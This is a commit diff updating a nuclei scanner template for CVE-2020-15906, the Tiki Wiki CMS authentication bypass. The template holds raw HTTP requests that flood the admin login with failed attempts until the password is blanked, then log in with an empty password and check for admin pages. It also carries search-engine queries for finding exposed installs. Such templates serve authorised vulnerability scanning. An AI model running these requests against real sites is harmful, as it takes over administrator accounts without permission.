updated matcher & req

projectdiscovery · Aug 25, 2024 · 5a8449f · 5a8449f
1 parent 3ef00bc
commit 5a8449f
Showing 1 changed file with 14 additions and 13 deletions.
diff --git a/http/cves/2020/CVE-2020-15906.yaml b/http/cves/2020/CVE-2020-15906.yaml
@@ -1,14 +1,14 @@
 id: CVE-2020-15906
 
 info:
-  name: Tiki Wiki CMS GroupWare Auth Bypass
-  author: JeonSungHyun[nukunga], gy741, nechyo, nechyo, harksu
+  name: Tiki Wiki CMS GroupWare - Auth Bypass
+  author: JeonSungHyun[nukunga],gy741,nechyo,nechyo,harksu
   severity: critical
-  description: tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
+  description: |
+    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
   reference:
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15906
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
     - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
@@ -19,11 +19,10 @@ info:
     verified: true
     vendor: Tiki Wiki CMS
     product: Tiki Wiki CMS
-    shodan-query:
-      - title:"Tiki Wiki CMS"
-      - http.title:"Tiki Wiki CMS"
+    shodan-query: title:"Tiki Wiki CMS"
     fofa-query: title="Tiki Wiki CMS"
     google-query: intitle:"Tiki Wiki CMS
+  tags: cve,cve2020,tiki,wiki,auth-bypass
 
 http:
   - raw:
@@ -47,7 +46,8 @@ http:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{RootURL}}/tiki-login_scr.php
 
-        ticket=§ticket1§&user=admin&pass=§attempt§&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
+        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
+
     payloads:
       attempt:
         - nkQ0yYzgF5Er
@@ -114,7 +114,7 @@ http:
         Content-Type: application/x-www-form-urlencoded
         Referer: {{RootURL}}/tiki-login.php
 
-        ticket=§ticket2§&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
+        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n
 
     extractors:
       - type: regex
@@ -128,11 +128,12 @@ http:
   - raw:
       - |
         GET /tiki-index.php HTTP/1.1
+        Host: {{Hostname}}
 
-    cookie-reuse: true
     matchers-condition: or
     matchers:
       - type: word
+        part: body
         words:
           - "System Menu"
           - "Home"
@@ -141,9 +142,9 @@ http:
           - "File Galleries"
           - "Settings"
         condition: and
-        part: body
 
       - type: word
-        words :
+        words:
           - "Show on admin log-in"
           - "Tiki Setup"
+        condition: and